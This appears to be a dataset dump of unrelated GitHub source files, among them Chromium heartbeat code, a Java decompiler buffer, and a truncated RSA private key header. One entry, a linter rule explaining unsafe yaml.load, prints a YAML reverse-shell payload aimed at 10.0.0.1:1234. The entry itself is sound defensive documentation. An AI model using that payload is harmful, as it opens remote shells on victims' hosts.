text
stringlengths 2
99.5k
| meta
dict |
|---|---|
# AUTOGENERATED FILE
AT_FDCWD = 18446744073709551516
KDDISABIO = 536890173
KDENABIO = 536890172
KDGETLED = 1074023233
KDGKBMODE = 1074023174
KDMKTONE = 536890120
KDSETLED = 536890178
KDSETMODE = 536890122
KDSETRAD = 536890179
KD_GRAPHICS = 1
KD_TEXT = 0
K_RAW = 0
K_XLATE = 1
LED_CAP = 1
LED_NUM = 2
LED_SCR = 4
SYS_ioctl = 54
SYS_openat = 321
VT_ACKACQ = 2
VT_ACTIVATE = 536901125
VT_AUTO = 0
VT_FALSE = 0
VT_GETACTIVE = 1074034183
VT_GETMODE = 1074296323
VT_GETSTATE = 1074165348
VT_OPENQRY = 1074034177
VT_PROCESS = 1
VT_RELDISP = 536901124
VT_SETMODE = 2148038146
VT_TRUE = 1
VT_WAITACTIVE = 536901126
WSDISPLAYIO_ADDSCREEN = 2149865299
WSDISPLAYIO_DELFONT = 2153273167
WSDISPLAYIO_DELSCREEN = 2148030292
WSDISPLAYIO_GBURNER = 1074550610
WSDISPLAYIO_GETEMULTYPE = 3222558558
WSDISPLAYIO_GETSCREEN = 3223607125
WSDISPLAYIO_GETSCREENTYPE = 3223869277
WSDISPLAYIO_GMODE = 1074026315
WSDISPLAYIO_GVIDEO = 1074026308
WSDISPLAYIO_LDFONT = 2153273165
WSDISPLAYIO_LSFONT = 3227014990
WSDISPLAYIO_MODE_DUMBFB = 2
WSDISPLAYIO_MODE_EMUL = 0
WSDISPLAYIO_MODE_MAPPED = 1
WSDISPLAYIO_SBURNER = 2148292433
WSDISPLAYIO_SETSCREEN = 2147768150
WSDISPLAYIO_SMODE = 2147768140
WSDISPLAYIO_SVIDEO = 2147768133
WSDISPLAYIO_USEFONT = 2153273168
WSDISPLAYIO_VIDEO_OFF = 0
WSDISPLAYIO_VIDEO_ON = 1
WSDISPLAYIO_WSMOUSED = 2149078872
WSDISPLAY_BURN_KBD = 2
WSDISPLAY_BURN_MOUSE = 4
WSDISPLAY_BURN_OUTPUT = 8
WSDISPLAY_BURN_VBLANK = 1
WSDISPLAY_DELSCR_FORCE = 1
WSDISPLAY_DELSCR_QUIET = 2
WSDISPLAY_FONTENC_IBM = 1
WSDISPLAY_FONTENC_ISO = 0
WSDISPLAY_FONTORDER_KNOWN = 0
WSDISPLAY_FONTORDER_L2R = 1
WSDISPLAY_FONTORDER_R2L = 2
WSEMUL_NAME_SIZE = 16
WSFONT_NAME_SIZE = 32
WSKBDIO_BELL = 536893185
WSKBDIO_COMPLEXBELL = 2148554498
WSKBDIO_GETBACKLIGHT = 1074550545
WSKBDIO_GETBELL = 1074812676
WSKBDIO_GETDEFAULTBELL = 1074812678
WSKBDIO_GETDEFAULTKEYREPEAT = 1074550538
WSKBDIO_GETENCODING = 1074026255
WSKBDIO_GETENCODINGS = 3222296341
WSKBDIO_GETKEYREPEAT = 1074550536
WSKBDIO_GETMAP = 3222296333
WSKBDIO_GETMODE = 1074026260
WSKBDIO_SETBACKLIGHT = 2148292370
WSKBDIO_SETBELL = 2148554499
WSKBDIO_SETDEFAULTBELL = 2148554501
WSKBDIO_SETDEFAULTKEYREPEAT = 2148292361
WSKBDIO_SETENCODING = 2147768080
WSKBDIO_SETKEYREPEAT = 2148292359
WSKBDIO_SETMAP = 2148554510
WSKBDIO_SETMODE = 2147768083
WSKBD_RAW = 1
WSMOUSECFG_BOTTOM_EDGE = 131
WSMOUSECFG_CENTERWIDTH = 132
WSMOUSECFG_DECELERATION = 36
WSMOUSECFG_DISABLE = 71
WSMOUSECFG_DX_MAX = 32
WSMOUSECFG_DX_SCALE = 0
WSMOUSECFG_DY_MAX = 33
WSMOUSECFG_DY_SCALE = 1
WSMOUSECFG_EDGESCROLL = 68
WSMOUSECFG_F2PRESSURE = 136
WSMOUSECFG_F2WIDTH = 135
WSMOUSECFG_HORIZSCROLL = 69
WSMOUSECFG_HORIZSCROLLDIST = 133
WSMOUSECFG_LEFT_EDGE = 128
WSMOUSECFG_LOG_EVENTS = 257
WSMOUSECFG_LOG_INPUT = 256
WSMOUSECFG_PRESSURE_HI = 3
WSMOUSECFG_PRESSURE_LO = 2
WSMOUSECFG_RIGHT_EDGE = 129
WSMOUSECFG_SMOOTHING = 38
WSMOUSECFG_SOFTBUTTONS = 64
WSMOUSECFG_SOFTMBTN = 65
WSMOUSECFG_STRONG_HYSTERESIS = 37
WSMOUSECFG_SWAPSIDES = 70
WSMOUSECFG_SWAPXY = 5
WSMOUSECFG_TAPPING = 72
WSMOUSECFG_TAP_CLICKTIME = 138
WSMOUSECFG_TAP_LOCKTIME = 139
WSMOUSECFG_TAP_MAXTIME = 137
WSMOUSECFG_TOPBUTTONS = 66
WSMOUSECFG_TOP_EDGE = 130
WSMOUSECFG_TRKMAXDIST = 4
WSMOUSECFG_TWOFINGERSCROLL = 67
WSMOUSECFG_VERTSCROLLDIST = 134
WSMOUSECFG_X_HYSTERESIS = 34
WSMOUSECFG_X_INV = 6
WSMOUSECFG_Y_HYSTERESIS = 35
WSMOUSECFG_Y_INV = 7
WSMOUSEIO_GCALIBCOORDS = 1092638501
WSMOUSEIO_GETPARAMS = 2148554535
WSMOUSEIO_GTYPE = 1074026272
WSMOUSEIO_SCALIBCOORDS = 2166380324
WSMOUSEIO_SETMODE = 2147768102
WSMOUSEIO_SETPARAMS = 2148554536
WSMOUSEIO_SRES = 2147768097
WSMOUSE_CALIBCOORDS_MAX = 16
WSMOUSE_COMPAT = 0
WSMOUSE_NATIVE = 1
WSMUXIO_ADD_DEVICE = 2148030305
WSMUXIO_INJECTEVENT = 2149078880
WSMUXIO_LIST_DEVICES = 3238287203
WSMUXIO_REMOVE_DEVICE = 2148030306
WSMUX_KBD = 2
WSMUX_MAXDEV = 32
WSMUX_MOUSE = 1
WSMUX_MUX = 3
WSSCREEN_NAME_SIZE = 16
|
{
"pile_set_name": "Github"
}
|
// Copyright 2014 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "google_apis/gcm/engine/heartbeat_manager.h"
#include <utility>
#include "base/callback.h"
#include "base/location.h"
#include "base/metrics/histogram_macros.h"
#include "base/power_monitor/power_monitor.h"
#include "base/threading/thread_task_runner_handle.h"
#include "base/time/time.h"
#include "base/timer/timer.h"
#include "build/build_config.h"
#include "google_apis/gcm/protocol/mcs.pb.h"
#include "net/base/network_change_notifier.h"
namespace gcm {
namespace {
// The default heartbeat when on a mobile or unknown network .
const int kCellHeartbeatDefaultMs = 1000 * 60 * 28; // 28 minutes.
// The default heartbeat when on WiFi (also used for ethernet).
const int kWifiHeartbeatDefaultMs = 1000 * 60 * 15; // 15 minutes.
// The default heartbeat ack interval.
const int kHeartbeatAckDefaultMs = 1000 * 60 * 1; // 1 minute.
// Minimum allowed client default heartbeat interval.
const int kMinClientHeartbeatIntervalMs = 1000 * 30; // 30 seconds.
// Minimum time spent sleeping before we force a new heartbeat.
const int kMinSuspendTimeMs = 1000 * 10; // 10 seconds.
#if defined(OS_LINUX) && !defined(OS_CHROMEOS)
// The period at which to check if the heartbeat time has passed. Used to
// protect against platforms where the timer is delayed by the system being
// suspended. Only needed on linux because the other OSes provide a standard
// way to be notified of system suspend and resume events.
const int kHeartbeatMissedCheckMs = 1000 * 60 * 5; // 5 minutes.
#endif // defined(OS_LINUX) && !defined(OS_CHROMEOS)
} // namespace
HeartbeatManager::HeartbeatManager()
: waiting_for_ack_(false),
heartbeat_interval_ms_(0),
server_interval_ms_(0),
client_interval_ms_(0),
heartbeat_timer_(new base::Timer(true /* retain_user_task */,
false /* is_repeating */)),
weak_ptr_factory_(this) {
}
HeartbeatManager::~HeartbeatManager() {
// Stop listening for system suspend and resume events.
base::PowerMonitor* monitor = base::PowerMonitor::Get();
if (monitor)
monitor->RemoveObserver(this);
}
void HeartbeatManager::Start(
const base::Closure& send_heartbeat_callback,
const ReconnectCallback& trigger_reconnect_callback) {
DCHECK(!send_heartbeat_callback.is_null());
DCHECK(!trigger_reconnect_callback.is_null());
send_heartbeat_callback_ = send_heartbeat_callback;
trigger_reconnect_callback_ = trigger_reconnect_callback;
// Listen for system suspend and resume events.
base::PowerMonitor* monitor = base::PowerMonitor::Get();
if (monitor)
monitor->AddObserver(this);
// Calculated the heartbeat interval just before we start the timer.
UpdateHeartbeatInterval();
// Kicks off the timer.
waiting_for_ack_ = false;
RestartTimer();
}
void HeartbeatManager::Stop() {
heartbeat_expected_time_ = base::Time();
heartbeat_interval_ms_ = 0;
heartbeat_timer_->Stop();
waiting_for_ack_ = false;
base::PowerMonitor* monitor = base::PowerMonitor::Get();
if (monitor)
monitor->RemoveObserver(this);
}
void HeartbeatManager::OnHeartbeatAcked() {
if (!heartbeat_timer_->IsRunning())
return;
DCHECK(!send_heartbeat_callback_.is_null());
DCHECK(!trigger_reconnect_callback_.is_null());
waiting_for_ack_ = false;
RestartTimer();
}
void HeartbeatManager::UpdateHeartbeatConfig(
const mcs_proto::HeartbeatConfig& config) {
if (!config.IsInitialized() ||
!config.has_interval_ms() ||
config.interval_ms() <= 0) {
return;
}
DVLOG(1) << "Updating server heartbeat interval to " << config.interval_ms();
server_interval_ms_ = config.interval_ms();
// Make sure heartbeat interval is recalculated when new server interval is
// available.
UpdateHeartbeatInterval();
}
base::TimeTicks HeartbeatManager::GetNextHeartbeatTime() const {
if (heartbeat_timer_->IsRunning())
return heartbeat_timer_->desired_run_time();
else
return base::TimeTicks();
}
void HeartbeatManager::UpdateHeartbeatTimer(
std::unique_ptr<base::Timer> timer) {
bool was_running = heartbeat_timer_->IsRunning();
base::TimeDelta remaining_delay =
heartbeat_timer_->desired_run_time() - base::TimeTicks::Now();
base::Closure timer_task(heartbeat_timer_->user_task());
heartbeat_timer_->Stop();
heartbeat_timer_ = std::move(timer);
if (was_running)
heartbeat_timer_->Start(FROM_HERE, remaining_delay, timer_task);
}
void HeartbeatManager::OnSuspend() {
// The system is going to sleep. Record the time, so on resume we know how
// much time the machine was suspended.
suspend_time_ = base::Time::Now();
}
void HeartbeatManager::OnResume() {
// The system just resumed from sleep. It's likely that the connection to
// MCS was silently lost during that time, even if a heartbeat is not yet
// due. Force a heartbeat to detect if the connection is still good.
base::TimeDelta elapsed = base::Time::Now() - suspend_time_;
UMA_HISTOGRAM_LONG_TIMES("GCM.SuspendTime", elapsed);
// Make sure a minimum amount of time has passed before forcing a heartbeat to
// avoid any tight loop scenarios.
// If the |send_heartbeat_callback_| is null, it means the heartbeat manager
// hasn't been started, so do nothing.
if (elapsed > base::TimeDelta::FromMilliseconds(kMinSuspendTimeMs) &&
!send_heartbeat_callback_.is_null())
OnHeartbeatTriggered();
}
void HeartbeatManager::OnHeartbeatTriggered() {
// Reset the weak pointers used for heartbeat checks.
weak_ptr_factory_.InvalidateWeakPtrs();
if (waiting_for_ack_) {
LOG(WARNING) << "Lost connection to MCS, reconnecting.";
ResetConnection(ConnectionFactory::HEARTBEAT_FAILURE);
return;
}
waiting_for_ack_ = true;
RestartTimer();
send_heartbeat_callback_.Run();
}
void HeartbeatManager::RestartTimer() {
int interval_ms = heartbeat_interval_ms_;
if (waiting_for_ack_) {
interval_ms = kHeartbeatAckDefaultMs;
DVLOG(1) << "Resetting timer for ack within " << interval_ms << " ms.";
} else {
DVLOG(1) << "Sending next heartbeat in " << interval_ms << " ms.";
}
heartbeat_expected_time_ =
base::Time::Now() + base::TimeDelta::FromMilliseconds(interval_ms);
heartbeat_timer_->Start(FROM_HERE,
base::TimeDelta::FromMilliseconds(interval_ms),
base::Bind(&HeartbeatManager::OnHeartbeatTriggered,
weak_ptr_factory_.GetWeakPtr()));
#if defined(OS_LINUX) && !defined(OS_CHROMEOS)
// Windows, Mac, Android, iOS, and Chrome OS all provide a way to be notified
// when the system is suspending or resuming. The only one that does not is
// Linux so we need to poll to check for missed heartbeats.
base::ThreadTaskRunnerHandle::Get()->PostDelayedTask(
FROM_HERE,
base::Bind(&HeartbeatManager::CheckForMissedHeartbeat,
weak_ptr_factory_.GetWeakPtr()),
base::TimeDelta::FromMilliseconds(kHeartbeatMissedCheckMs));
#endif // defined(OS_LINUX) && !defined(OS_CHROMEOS)
}
void HeartbeatManager::CheckForMissedHeartbeat() {
// If there's no heartbeat pending, return without doing anything.
if (heartbeat_expected_time_.is_null())
return;
// If the heartbeat has been missed, manually trigger it.
if (base::Time::Now() > heartbeat_expected_time_) {
UMA_HISTOGRAM_LONG_TIMES("GCM.HeartbeatMissedDelta",
base::Time::Now() - heartbeat_expected_time_);
OnHeartbeatTriggered();
return;
}
#if defined(OS_LINUX) && !defined(OS_CHROMEOS)
// Otherwise check again later.
base::ThreadTaskRunnerHandle::Get()->PostDelayedTask(
FROM_HERE,
base::Bind(&HeartbeatManager::CheckForMissedHeartbeat,
weak_ptr_factory_.GetWeakPtr()),
base::TimeDelta::FromMilliseconds(kHeartbeatMissedCheckMs));
#endif // defined(OS_LINUX) && !defined(OS_CHROMEOS)
}
void HeartbeatManager::UpdateHeartbeatInterval() {
// Server interval takes precedence over client interval, even if the latter
// is less.
if (server_interval_ms_ != 0) {
// If a server interval is set, it overrides any local one.
heartbeat_interval_ms_ = server_interval_ms_;
} else if (HasClientHeartbeatInterval() &&
(client_interval_ms_ < heartbeat_interval_ms_ ||
heartbeat_interval_ms_ == 0)) {
// Client interval might have been adjusted up, which should only take
// effect during a reconnection.
heartbeat_interval_ms_ = client_interval_ms_;
} else if (heartbeat_interval_ms_ == 0) {
// If interval is still 0, recalculate it based on network type.
heartbeat_interval_ms_ = GetDefaultHeartbeatInterval();
}
DCHECK_GT(heartbeat_interval_ms_, 0);
}
int HeartbeatManager::GetDefaultHeartbeatInterval() {
// For unknown connections, use the longer cellular heartbeat interval.
int heartbeat_interval_ms = kCellHeartbeatDefaultMs;
if (net::NetworkChangeNotifier::GetConnectionType() ==
net::NetworkChangeNotifier::CONNECTION_WIFI ||
net::NetworkChangeNotifier::GetConnectionType() ==
net::NetworkChangeNotifier::CONNECTION_ETHERNET) {
heartbeat_interval_ms = kWifiHeartbeatDefaultMs;
}
return heartbeat_interval_ms;
}
int HeartbeatManager::GetMaxClientHeartbeatIntervalMs() {
return GetDefaultHeartbeatInterval();
}
int HeartbeatManager::GetMinClientHeartbeatIntervalMs() {
// Returning a constant. This should be adjusted for connection type, like the
// default/max interval.
return kMinClientHeartbeatIntervalMs;
}
void HeartbeatManager::SetClientHeartbeatIntervalMs(int interval_ms) {
if ((interval_ms != 0 && !IsValidClientHeartbeatInterval(interval_ms)) ||
interval_ms == client_interval_ms_) {
return;
}
client_interval_ms_ = interval_ms;
// Only reset connection if the new heartbeat interval is shorter. If it is
// longer, the connection will reset itself at some point and interval will be
// fixed.
if (client_interval_ms_ > 0 && client_interval_ms_ < heartbeat_interval_ms_) {
ResetConnection(ConnectionFactory::NEW_HEARTBEAT_INTERVAL);
}
}
int HeartbeatManager::GetClientHeartbeatIntervalMs() {
return client_interval_ms_;
}
bool HeartbeatManager::HasClientHeartbeatInterval() {
return client_interval_ms_ != 0;
}
bool HeartbeatManager::IsValidClientHeartbeatInterval(int interval) {
int max_heartbeat_interval = GetDefaultHeartbeatInterval();
return kMinClientHeartbeatIntervalMs <= interval &&
interval <= max_heartbeat_interval;
}
void HeartbeatManager::ResetConnection(
ConnectionFactory::ConnectionResetReason reason) {
Stop();
trigger_reconnect_callback_.Run(reason);
}
} // namespace gcm
|
{
"pile_set_name": "Github"
}
|
// Copyright © 2019 Banzai Cloud
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package monitoring
type outputPrometheus struct {
baseOutput
}
func newPrometheusOutputHelper(
kubeConfig []byte,
spec integratedServiceSpec,
) outputPrometheus {
return outputPrometheus{
baseOutput: baseOutput{
ingress: spec.Prometheus.Ingress.baseIngressSpec,
secretID: spec.Prometheus.Ingress.SecretID,
enabled: spec.Prometheus.Enabled,
k8sConfig: kubeConfig,
},
}
}
func (outputPrometheus) getOutputType() string {
return "Prometheus"
}
func (outputPrometheus) getTopLevelDeploymentKey() string {
return "prometheus"
}
func (outputPrometheus) getDeploymentValueParentKey() string {
return "prometheusSpec"
}
func (outputPrometheus) getGeneratedSecretName(clusterID uint) string {
return getPrometheusSecretName(clusterID)
}
func (outputPrometheus) getServiceName() string {
return "monitor-prometheus-operato-prometheus"
}
|
{
"pile_set_name": "Github"
}
|
<?php
/**
* Copyright © Vaimo Group. All rights reserved.
* See LICENSE_VAIMO.txt for license details.
*/
namespace Vaimo\ComposerPatches\Composer\Commands;
class ApplyCommand extends \Vaimo\ComposerPatches\Composer\Commands\PatchCommand
{
protected function configure()
{
parent::configure();
$this->setName('patch:apply');
$this->setDescription('Apply a patch or patches for certain package(s)');
$definition = $this->getDefinition();
$options = $definition->getOptions();
unset($options['redo'], $options['undo']);
$definition->setOptions($options);
}
}
|
{
"pile_set_name": "Github"
}
|
- [name , hr, avg ]
- [Mark McGwire, 65, 0.278]
- [Sammy Sosa , 63, 0.288]
|
{
"pile_set_name": "Github"
}
|
5f04c27cc6ee8625fe2405fb0f7da9a3
|
{
"pile_set_name": "Github"
}
|
<keyframes />
|
{
"pile_set_name": "Github"
}
|
# SVPinView
SVPinView is a light-weight customisable library used for accepting pin numbers or one-time passwords.
<p align="left">
<a href="https://developer.apple.com/swift"><img src="https://img.shields.io/badge/Swift_4-compatible-4BC51D.svg?style=flat" alt="Swift 4 compatible" /></a>
<a href="https://cocoapods.org/pods/ScrollableDatepicker"><img src="https://img.shields.io/badge/pod-2.1.0-blue.svg" alt="CocoaPods compatible" /></a>
<img src="https://img.shields.io/badge/platform-iOS-blue.svg?style=flat" alt="Platform iOS" />
<a href="https://raw.githubusercontent.com/maxsokolov/tablekit/master/LICENSE"><img src="http://img.shields.io/badge/license-MIT-blue.svg?style=flat" alt="License: MIT" /></a>
</p>

## Getting Started
An [example ViewController](https://github.com/xornorik/SVPinView/blob/master/SVPinView/Example/PinViewController.swift) is included for demonstrating the functionality of SVPinView.
## Installation
### CocoaPods
Add the following line to your Podfile:
```ruby
pod 'SVPinView'
```
Then run the following in the same directory as your Podfile:
```ruby
pod install
```
### Manual
Clone the repo and drag files from `SVPinView/Source` folder into your Xcode project.
## Usage
### Storyboard

### Code
```swift
pinView.pinLength = 5
pinView.secureCharacter = "\u{25CF}"
pinView.interSpace = 5
pinView.textColor = UIColor.black
pinView.underlineColor = UIColor.black
pinView.underLineThickness = 2
pinView.shouldSecureText = true
pinView.font = UIFont.systemFont(ofSize: 15)
pinView.keyboardType = .phonePad
pinView.pinIinputAccessoryView = UIView()
```
### Callbacks
SVPinView has a 'didFinish' callback, which gets executed after the pin has been entered. This is useful when a network call has to be made or for navigating to a different ViewController after the pin has been entered.
```swift
pinView.didFinishCallback = { pin in
print("The pin entered is \(pin)")
}
```
## Requirements
- iOS 9.0
- Xcode 8.0
## License
SVPinView is available under the MIT license. See LICENSE for details.
|
{
"pile_set_name": "Github"
}
|
attic
Everything else.
Collection of configs which:
may be obsolete
may be unsupported
may be useful for study
|
{
"pile_set_name": "Github"
}
|
#if defined __thumb__
#include "../../string/strcpy.c"
#else
#include <string.h>
#include "xscale.h"
char *
strcpy (char *dest, const char *src)
{
char *dest0 = dest;
asm (PRELOADSTR ("%0") : : "r" (src));
#ifndef __OPTIMIZE_SIZE__
if (((long)src & 3) == ((long)dest & 3))
{
/* Skip unaligned part. */
while ((long)src & 3)
{
if (! (*dest++ = *src++))
return dest0;
}
/* Load two constants:
R4 = 0xfefefeff [ == ~(0x80808080 << 1) ]
R5 = 0x80808080 */
asm ("mov r5, #0x80\n\
ldr r1, [%1, #0]\n\
add r5, r5, #0x8000\n\
add r5, r5, r5, lsl #16\n\
mvn r4, r5, lsl #1\n\
\n\
add r3, r1, r5\n\
bic r3, r3, r1\n\
ands r2, r3, r4\n\
bne 1f\n\
0:\n\
ldr r3, [%1, #0]\n\
ldr r1, [%1, #4]!\n\
" PRELOADSTR("%1") "\n\
str r3, [%0], #4\n\
add r2, r1, r4\n\
bic r2, r2, r1\n\
ands r3, r2, r5\n\
beq 0b\n\
1:"
: "=&r" (dest), "=&r" (src)
: "0" (dest), "1" (src)
: "r1", "r2", "r3", "r4", "r5", "memory", "cc");
}
#endif
while (*dest++ = *src++)
asm (PRELOADSTR ("%0") : : "r" (src));
return dest0;
}
#endif
|
{
"pile_set_name": "Github"
}
|
/*
* Copyright 2000-2015 JetBrains s.r.o.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.jetbrains.java.decompiler.main;
import org.jetbrains.java.decompiler.main.extern.IFernflowerPreferences;
import org.jetbrains.java.decompiler.util.StringUtil;
import java.util.*;
/**
* Allows to connect text with resulting lines
*
* @author egor
*/
public class TextBuffer
{
private final String myLineSeparator = DecompilerContext.getNewLineSeparator( );
private final String myIndent = (String) DecompilerContext.getProperty( IFernflowerPreferences.INDENT_STRING );
private final StringBuilder myStringBuilder;
private Map<Integer, Integer> myLineToOffsetMapping = null;
public TextBuffer( )
{
myStringBuilder = new StringBuilder( );
}
public TextBuffer( int size )
{
myStringBuilder = new StringBuilder( size );
}
public TextBuffer( String text )
{
myStringBuilder = new StringBuilder( text );
}
public TextBuffer append( String str )
{
myStringBuilder.append( str );
return this;
}
public TextBuffer append( char ch )
{
myStringBuilder.append( ch );
return this;
}
public TextBuffer append( int i )
{
myStringBuilder.append( i );
return this;
}
public TextBuffer appendLineSeparator( )
{
myStringBuilder.append( myLineSeparator );
return this;
}
public TextBuffer appendIndent( int length )
{
while ( length-- > 0 )
{
append( myIndent );
}
return this;
}
public TextBuffer prepend( String s )
{
insert( 0, s );
return this;
}
public TextBuffer enclose( String left, String right )
{
prepend( left );
append( right );
return this;
}
public boolean containsOnlyWhitespaces( )
{
for ( int i = 0; i < myStringBuilder.length( ); i++ )
{
if ( myStringBuilder.charAt( i ) != ' ' )
{
return false;
}
}
return true;
}
@Override
public String toString( )
{
String original = myStringBuilder.toString( );
if ( myLineToOffsetMapping == null || myLineToOffsetMapping.isEmpty( ) )
{
if ( myLineMapping != null )
{
return addOriginalLineNumbers( );
}
return original;
}
else
{
StringBuilder res = new StringBuilder( );
String[] srcLines = original.split( myLineSeparator );
int currentLineStartOffset = 0;
int currentLine = 0;
int previousMarkLine = 0;
int dumpedLines = 0;
ArrayList<Integer> linesWithMarks = new ArrayList<Integer>( myLineToOffsetMapping.keySet( ) );
Collections.sort( linesWithMarks );
for ( Integer markLine : linesWithMarks )
{
Integer markOffset = myLineToOffsetMapping.get( markLine );
while ( currentLine < srcLines.length )
{
String line = srcLines[currentLine];
int lineEnd = currentLineStartOffset
+ line.length( )
+ myLineSeparator.length( );
if ( markOffset <= lineEnd )
{
int requiredLine = markLine - 1;
int linesToAdd = requiredLine - dumpedLines;
dumpedLines = requiredLine;
appendLines( res,
srcLines,
previousMarkLine,
currentLine,
linesToAdd );
previousMarkLine = currentLine;
break;
}
currentLineStartOffset = lineEnd;
currentLine++;
}
}
if ( previousMarkLine < srcLines.length )
{
appendLines( res,
srcLines,
previousMarkLine,
srcLines.length,
srcLines.length - previousMarkLine );
}
return res.toString( );
}
}
private String addOriginalLineNumbers( )
{
StringBuilder sb = new StringBuilder( );
int lineStart = 0, lineEnd;
int count = 0, length = myLineSeparator.length( );
while ( ( lineEnd = myStringBuilder.indexOf( myLineSeparator, lineStart ) ) > 0 )
{
++count;
sb.append( myStringBuilder.substring( lineStart, lineEnd ) );
Set<Integer> integers = myLineMapping.get( count );
if ( integers != null )
{
sb.append( "//" );
for ( Integer integer : integers )
{
sb.append( ' ' ).append( integer );
}
}
sb.append( myLineSeparator );
lineStart = lineEnd + length;
}
if ( lineStart < myStringBuilder.length( ) )
{
sb.append( myStringBuilder.substring( lineStart ) );
}
return sb.toString( );
}
private void appendLines( StringBuilder res, String[] srcLines, int from,
int to, int requiredLineNumber )
{
if ( to - from > requiredLineNumber )
{
List<String> strings = compactLines( Arrays.asList( srcLines )
.subList( from, to ), requiredLineNumber );
int separatorsRequired = requiredLineNumber - 1;
for ( String s : strings )
{
res.append( s );
if ( separatorsRequired-- > 0 )
{
res.append( myLineSeparator );
}
}
res.append( myLineSeparator );
}
else if ( to - from <= requiredLineNumber )
{
for ( int i = from; i < to; i++ )
{
res.append( srcLines[i] ).append( myLineSeparator );
}
for ( int i = 0; i < requiredLineNumber - to + from; i++ )
{
res.append( myLineSeparator );
}
}
}
public int length( )
{
return myStringBuilder.length( );
}
public String substring( int start )
{
return myStringBuilder.substring( start );
}
public TextBuffer setStart( int position )
{
myStringBuilder.delete( 0, position );
shiftMapping( 0, -position );
return this;
}
public void setLength( int position )
{
myStringBuilder.setLength( position );
if ( myLineToOffsetMapping != null )
{
HashMap<Integer, Integer> newMap = new HashMap<Integer, Integer>( );
for ( Map.Entry<Integer, Integer> entry : myLineToOffsetMapping.entrySet( ) )
{
if ( entry.getValue( ) <= position )
{
newMap.put( entry.getKey( ), entry.getValue( ) );
}
}
myLineToOffsetMapping = newMap;
}
}
public TextBuffer append( TextBuffer buffer )
{
if ( buffer.myLineToOffsetMapping != null
&& !buffer.myLineToOffsetMapping.isEmpty( ) )
{
checkMapCreated( );
for ( Map.Entry<Integer, Integer> entry : buffer.myLineToOffsetMapping.entrySet( ) )
{
myLineToOffsetMapping.put( entry.getKey( ), entry.getValue( )
+ myStringBuilder.length( ) );
}
}
myStringBuilder.append( buffer.myStringBuilder );
return this;
}
private void shiftMapping( int startOffset, int shiftOffset )
{
if ( myLineToOffsetMapping != null )
{
HashMap<Integer, Integer> newMap = new HashMap<Integer, Integer>( );
for ( Map.Entry<Integer, Integer> entry : myLineToOffsetMapping.entrySet( ) )
{
int newValue = entry.getValue( );
if ( newValue >= startOffset )
{
newValue += shiftOffset;
}
if ( newValue >= 0 )
{
newMap.put( entry.getKey( ), newValue );
}
}
myLineToOffsetMapping = newMap;
}
}
private void checkMapCreated( )
{
if ( myLineToOffsetMapping == null )
{
myLineToOffsetMapping = new HashMap<Integer, Integer>( );
}
}
public TextBuffer insert( int offset, String s )
{
myStringBuilder.insert( offset, s );
shiftMapping( offset, s.length( ) );
return this;
}
public int countLines( )
{
return countLines( 0 );
}
public int countLines( int from )
{
return count( myLineSeparator, from );
}
public int count( String substring, int from )
{
int count = 0, length = substring.length( ), p = from;
while ( ( p = myStringBuilder.indexOf( substring, p ) ) > 0 )
{
++count;
p += length;
}
return count;
}
private static List<String> compactLines( List<String> srcLines,
int requiredLineNumber )
{
if ( srcLines.size( ) < 2 || srcLines.size( ) <= requiredLineNumber )
{
return srcLines;
}
List<String> res = new LinkedList<String>( srcLines );
// first join lines with a single { or }
for ( int i = res.size( ) - 1; i > 0; i-- )
{
String s = res.get( i );
if ( s.trim( ).equals( "{" ) || s.trim( ).equals( "}" ) )
{
res.set( i - 1, res.get( i - 1 ).concat( s ) );
res.remove( i );
}
if ( res.size( ) <= requiredLineNumber )
{
return res;
}
}
// now join empty lines
for ( int i = res.size( ) - 1; i > 0; i-- )
{
String s = res.get( i );
if ( StringUtil.isEmpty( s.trim( ) ) )
{
res.set( i - 1, res.get( i - 1 ).concat( s ) );
res.remove( i );
}
if ( res.size( ) <= requiredLineNumber )
{
return res;
}
}
return res;
}
private Map<Integer, Set<Integer>> myLineMapping = null; // new to original
public void dumpOriginalLineNumbers( int[] lineMapping )
{
if ( lineMapping.length > 0 )
{
myLineMapping = new HashMap<Integer, Set<Integer>>( );
for ( int i = 0; i < lineMapping.length; i += 2 )
{
int key = lineMapping[i + 1];
Set<Integer> existing = myLineMapping.get( key );
if ( existing == null )
{
existing = new TreeSet<Integer>( );
myLineMapping.put( key, existing );
}
existing.add( lineMapping[i] );
}
}
}
}
|
{
"pile_set_name": "Github"
}
|
# YML100
Use of unsafe yaml load. Allows instantiation of arbitrary objects. Consider yaml.safe_load().
The Pyyaml library's default loader will read any YAML attributes starting with `!!` as special syntax, including the `!!python/object/apply` command, which can execute any method in the standard library.
Because the standard library includes functions to starting local processes, using `yaml.load` against this input would execute local commands on the host shell.
## Deprecation in pyyaml 5.1
Wait, didn't pyyaml deprecate the unsafe loader?
Not really- newer versions of pyyaml (5.1) will raise a __warning__, however many situations like web servers developers would not see this warning.
## Example
```python
import yaml
with open('cfg.yaml') as cfg:
config = yaml.load(cfg)
```
Any attackers payload could look something like this:
```yaml
!!python/object/apply:exec ['import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);']
```
When deserialized, this would start a shell on TCP 10.0.0.1:1234.
## Quick Fixes
* Plugin will recommend [Safe Load Fixer](../fixes/safeloadfixer.md).
## See Also
* [YAML Load Input Documentation](https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation)
|
{
"pile_set_name": "Github"
}
|
-----BEGIN RSA PRIVATE KEY-----
MIIJKgIBAAKCAgEAuucA4YjxmpgZ9NTtUEMUVwhCEuoQPRRSbutFapvXpWHyS73/
